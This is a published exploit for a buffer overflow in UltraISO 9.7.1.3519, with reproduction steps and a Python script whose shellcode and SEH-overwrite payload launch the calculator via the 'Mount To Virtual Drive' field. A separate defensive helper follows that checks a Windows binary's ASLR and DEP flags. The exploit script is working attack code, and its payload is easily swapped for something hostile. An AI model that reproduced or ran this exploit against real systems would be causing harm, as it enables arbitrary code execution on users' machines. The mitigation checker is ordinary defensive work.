UltraISO 9.7.1.3519 - Buffer Overflow (SEH)
Source: @Pwsecspirit  Author: Singh  Published: 2018-08-29
# Exploit Title: UltraISO 9.7.1.3519 - Buffer Overflow (SEH)
# Date: 2018-08-23
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Vendor Homepage: https://www.ultraiso.com
# Software Link Download: https://www.ultraiso.com/download.html
# Tested on: Windows 7 Ultimate - 64-bit
# Steps to Reproduce:
# 1. Run the Python exploit script; it will create a new file named "exploit.txt".
# 2. Copy the text inside "exploit.txt".
# 3. Start the UltraISO program.
# 4. In the new window click "Tools" > "Mount To Virtual Drive".
# 5. Now paste the content of "exploit.txt" into the field "Image File".
# 6. Click "Mount" and you will see a lot of calculators.
# Thanks: corelanc0d3r and PeaceMaker
 
#!/usr/bin/env python
 
#Badchars \x00\x0a\x0d
shellcode  = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
#Exit intermodular call
shellcode += "\xB8\x8A\x70\xA0\xFF\xF7\xD8\x50\xC3"
fill = "\x42" * (126 - len(shellcode))
junk = "A" * (1064 - len(shellcode) - len(fill))
#0x005540e9 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [UltraISO.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v9.7.1.3519 (C:\Program Files (x86)\UltraISO\UltraISO.exe)
sjmp = "\xeb\x80\xCC\xCC"
seh = "\xe9\x40\x55"
 
 
spirit = junk + shellcode + fill + sjmp + seh
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(spirit)
    f.write(spirit)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
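
The module comment above records UltraISO.exe as "ASLR: False, Rebase: False, SafeSEH: False". The following is an added example, not part of the original exploit or of any UltraISO code: a check a defender can run over a binary to see which exploit mitigations it opts in to, read from the DllCharacteristics field of the PE optional header. The helper sample_pe() and its header-only image are constructed for the demo; SafeSEH is recorded in the load configuration directory rather than in this field, so it is not covered here.

```python
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (PE/COFF specification)
FLAGS = {
    "ASLR (DYNAMIC_BASE)": 0x0040,
    "DEP (NX_COMPAT)": 0x0100,
    "NO_SEH": 0x0400,
    "CFG (GUARD_CF)": 0x4000,
}

def pe_mitigations(image: bytes) -> dict:
    """Return {mitigation name: bool} from a PE image's optional header."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    opt = e_lfanew + 24                      # 4-byte signature + 20-byte COFF header
    if len(image) < opt + 72 or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: bad or truncated PE header")
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):          # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers
    (chars,) = struct.unpack_from("<H", image, opt + 70)
    return {name: bool(chars & bit) for name, bit in FLAGS.items()}

def missing_mitigations(image: bytes) -> list:
    """Names of the opt-in mitigations the image lacks (NO_SEH is informational)."""
    report = pe_mitigations(image)
    return [n for n in ("ASLR (DYNAMIC_BASE)", "DEP (NX_COMPAT)") if not report[n]]

def sample_pe(dll_characteristics: int) -> bytes:
    """Constructed header-only PE32 image for the demo; not a real executable."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x0102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)             # PE32 magic
    struct.pack_into("<H", optional, 70, dll_characteristics)
    return dos + b"PE\0\0" + coff + bytes(optional)

if __name__ == "__main__":
    for label, bits in (("no opt-ins", 0x0000), ("hardened", 0x0140)):
        image = sample_pe(bits)
        print(label, pe_mitigations(image), missing_mitigations(image))
```

To audit an installed program, pass the file's bytes (for example open(path, "rb").read()) to missing_mitigations(); an empty list means the image opts in to both ASLR and DEP.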
 